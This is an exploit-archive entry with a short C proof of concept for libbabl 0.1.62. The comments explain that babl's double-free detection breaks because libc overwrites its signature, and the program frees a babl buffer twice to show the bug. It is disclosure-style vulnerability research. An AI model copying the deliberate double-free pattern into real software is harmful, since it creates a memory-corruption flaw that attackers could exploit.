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## https://sploitus.com/exploit?id=PACKETSTORM:160504
# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)  
# Date: December 14, 2020  
# Exploit Author: Carter Yagemann  
# Vendor Homepage: https://www.gegl.org  
# Software Link: https://www.gegl.org/babl/  
# Version: libbabl 0.1.62 and newer  
# Tested on: Debian Buster (Linux 4.19.0-9-amd64)  
# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c  
  
/*  
* Babl has an interesting way of managing buffers allocated and freed using babl_malloc()  
* and babl_free(). This is the structure of its allocations (taken from babl-memory.c):  
*  
* typedef struct  
* {  
* char *signature;  
* size_t size;  
* int (*destructor)(void *ptr);  
* } BablAllocInfo;  
*  
*  
* signature is used to track whether a chunk was allocated by babl, and if so, whether  
* it is currently allocated or freed. This is done by either pointing it to the global  
* string "babl-memory" or "So long and thanks for all the fish." (babl-memory.c:44).  
*  
* Using this signature, babl can detect bad behavior's like double free (babl-memory.c:173):  
*  
* void  
* babl_free (void *ptr,  
* ...)  
* {  
* ...  
* if (freed == BAI (ptr)->signature)  
* fprintf (stderr, "\nbabl:double free detected\n");  
*  
*  
* Or so the developers think. As it turns out, because babl internally uses libc's malloc()  
* and free(), which has its own data that it stores within freed chunks, most systems will  
* overwrite babl's signature variable upon freeing, breaking the double free detection.  
* The simple PoC below demonstrates this:  
*/  
  
#include <stdlib.h>  
#include <stdio.h>  
#include <string.h>  
  
#include <babl/babl-memory.h>  
  
int main(int argc, char **argv) {  
void *buf = babl_malloc(42);  
babl_free(buf);  
// BUG: reports an "unknown" pointer warning when the following is clea=  
rly a double free  
babl_free(buf);  
  
return 0;  
}